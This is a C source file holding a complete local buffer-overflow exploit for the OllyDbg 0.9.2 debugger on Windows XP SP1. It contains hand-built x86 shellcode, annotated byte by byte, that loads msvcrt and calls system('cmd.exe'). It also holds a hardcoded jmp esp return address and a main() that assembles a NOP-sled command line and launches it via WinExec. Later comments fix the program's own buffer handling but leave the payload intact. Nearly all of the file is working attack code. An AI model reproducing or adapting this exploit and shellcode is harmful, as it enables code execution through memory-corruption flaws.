- /* Ollydbg 0.9.2 exploit, This can be grabbed from http://sh0dan.org/files/ollyexploit.c
- Very lame, just getting the hang of this win32 stuff
- Ollydbg is vulnerable to a buffer overflow when a valid program is passed
- with a large argv[], this made debugging other local overflows, well trouble some
- so i thought i'd write a little exploit for it, this is what happens when you have
- too much free time... Shellcode is my own, not optimized i need to figure out
- how to push the full msvcrt and cmd.exe string to the stack (i created this shellcode using
- visual c++ __asm( so eh. yeh. This exploit will only work on WinXP SP1 due to hardcoding the
- jmpesp in kernel32.dll and the shellcode addresses are hardcoded for xp sp1.
- take a peek at http://sh0dan.org/files/llacmd.txt for win2ksp3 shellcode.
- Ollydbg can be downloaded from: http://home.t-online.de/home/Ollydbg/ if you're curious.
- -wire
- shouts to my kittens.
- */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Raw x86 payload, 105 bytes (sizeof shellcizode - 1; main() copies exactly
 * that many).  What the bytes below do, instruction by instruction: set up a
 * frame and push ebx/esi/edi, write the string "msvcrt" one byte at a time
 * onto the stack (6d 73 76 63 72 74 — the two zero dwords pushed just before
 * supply the NUL), call the LoadLibraryA address on it, then write "cmd.exe"
 * (63 6d 64 2e 65 78 65) the same way and call the system() address on it.
 * Both call targets are absolute addresses baked into the two "mov eax"
 * instructions, so the payload is tied to the XP SP1 DLL layout the file
 * header names; on any other build those bytes point elsewhere and the calls
 * would most likely just crash.  Every byte is fixed, so the sequence is a
 * stable signature for detection.
 */
char shellcizode[] =
    "\x55" // push ebp
    "\x8b\xec" // mov ebp, esp
    "\x53" // push ebx
    "\x56" // push esi
    "\x57" // push edi
    "\x8b\xe5" // mov esp, ebp
    "\x55" // push ebp
    "\x8b\xec" // mov ebp, esp
    "\x33\xff" // xor edi,edi
    "\x57" // push edi  (zero dword at [ebp-4])
    "\x57" // push edi  (zero dword at [ebp-8]; bytes [ebp-2],[ebp-1] stay 0 = NUL)
    "\xc6\x45\xf8\x6d" // mov byte ptr ss:[ebp-8],6d   'm'
    "\xc6\x45\xf9\x73" // mov byte ptr ss:[ebp-7],73   's'
    "\xc6\x45\xfa\x76" // mov byte ptr ss:[ebp-6],76   'v'
    "\xc6\x45\xfb\x63" // mov byte ptr ss:[ebp-5],63   'c'
    "\xc6\x45\xfc\x72" // mov byte ptr ss:[ebp-4],72   'r'
    "\xc6\x45\xfd\x74" // mov byte ptr ss:[ebp-3],74   't'
    "\xb8\x61\xd9\xe7\x77" // mov eax,kernel32.loadlibraryA; remember the address is stored inverted (little-endian)
    "\x50" // push eax
    "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8]
    "\x50" // push eax
    "\xff\x55\xf4" // call dword ptr ss:[ebp-c]
    "\x58" // pop eax
    "\x58" // pop eax
    "\x58" // pop eax
    "\x33\xc0" // xor eax,eax
    "\x50" // push eax  (zero dword at [ebp-4])
    "\x50" // push eax  (zero dword at [ebp-8]; byte [ebp-1] stays 0 = NUL)
    "\xc6\x45\xf8\x63" // mov byte ptr ss:[ebp-8],63   'c'
    "\xc6\x45\xf9\x6d" // mov byte ptr ss:[ebp-7],6d   'm'
    "\xc6\x45\xfa\x64" // mov byte ptr ss:[ebp-6],64   'd'
    "\xc6\x45\xfb\x2e" // mov byte ptr ss:[ebp-5],2e   '.'
    "\xc6\x45\xfc\x65" // mov byte ptr ss:[ebp-4],65   'e'
    "\xc6\x45\xfd\x78" // mov byte ptr ss:[ebp-3],78   'x'
    "\xc6\x45\xfe\x65" // mov byte ptr ss:[ebp-2],65   'e'
    "\xb8\x44\x80\xc2\x77" // mov eax, 77c28044; addy of system() from msvcrt in xp sp1
    "\x50" // push eax
    "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8]
    "\x50" // push eax
    "\xff\x55\xf4" // call dword ptr ss:[ebp-c]
    "\x83\xc4\x04" // add esp, 04h
    "\x5c" // pop esp
    "\xc3"; // ret we're done!
-
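/*
 * Builds the oversized command line described in the file header and hands
 * it to WinExec().  Layout of exp_buff, offsets exactly as the author wrote
 * them (x = 2 * strlen(ollyfile)):
 *   [0 .. strlen(hehbuf))   "<olly> <olly> "   (hehbuf)
 *   [.. 511+x)              0x90 padding
 *   [511+x .. 515+x)        jmpesp
 *   [518+x .. 623+x)        shellcizode (105 bytes)
 *   [700]                   NUL terminator
 * The only changes in this revision are to the program's own buffer
 * handling (two out-of-bounds stack writes in the original); the payload
 * offsets are untouched.
 *
 * argv[1]: path to the OllyDbg executable, truncated to 99 characters.
 * Returns 0 after WinExec(); exits with 1 on a usage error or when the
 * doubled path would not fit hehbuf.
 */
int main(int argc, char **argv) {
    char exp_buff[1024];
    char ollyfile[100];
    char hehbuf[200];
    int x;
    int n;
    DWORD jmpesp = 0x77E9AE59; // from kernel32.dll XP sp1

    if (argc != 2) {
        fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
        exit(1);
    }

    /* snprintf always NUL-terminates inside the buffer.  The original
     * strncpy(ollyfile, argv[1], 99) left a 99+ character path unterminated
     * and then wrote ollyfile[100], one byte past the end of the array
     * (valid indices are 0..99). */
    snprintf(ollyfile, sizeof ollyfile, "%s", argv[1]);

    x = (int)strlen(ollyfile) * 2; // each character changes where the return is by 2 characters due to it being passed once to
                                   // call the program and the other for calling itself C:\olly\ollydbg.exe C:\olly\ollydbg.exe ..
    memset(exp_buff, 0x90, sizeof exp_buff); //set our buff to nops...

    /* "<olly> <olly> " is up to 2*99 + 2 + NUL = 201 bytes, one more than
     * hehbuf holds, so the original sprintf could overrun hehbuf.  Bound the
     * write and refuse a truncated command line instead. */
    n = snprintf(hehbuf, sizeof hehbuf, "%s %s ", ollyfile, ollyfile); // C:\ollydbg.exe C:\ollydbg...
    if (n < 0 || (size_t)n >= sizeof hehbuf) {
        fprintf(stderr, "heh: path too long\n");
        exit(1);
    }

    memcpy(exp_buff, hehbuf, strlen(hehbuf));

    memcpy(exp_buff + 511 + x, &jmpesp, sizeof jmpesp); // C:\ollydbg.exe C:\ollydbg.exe NOPx511+x

    memcpy(exp_buff + 518 + x, shellcizode, sizeof shellcizode - 1); // And our shellcode (105 bytes).
    exp_buff[700] = 0x00; // null it so we're passing a valid string.
    //fprintf(stderr, "%s", exp_buff); //debugging heh

    WinExec(exp_buff, SW_SHOW); //execute....
    return(0);
}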
-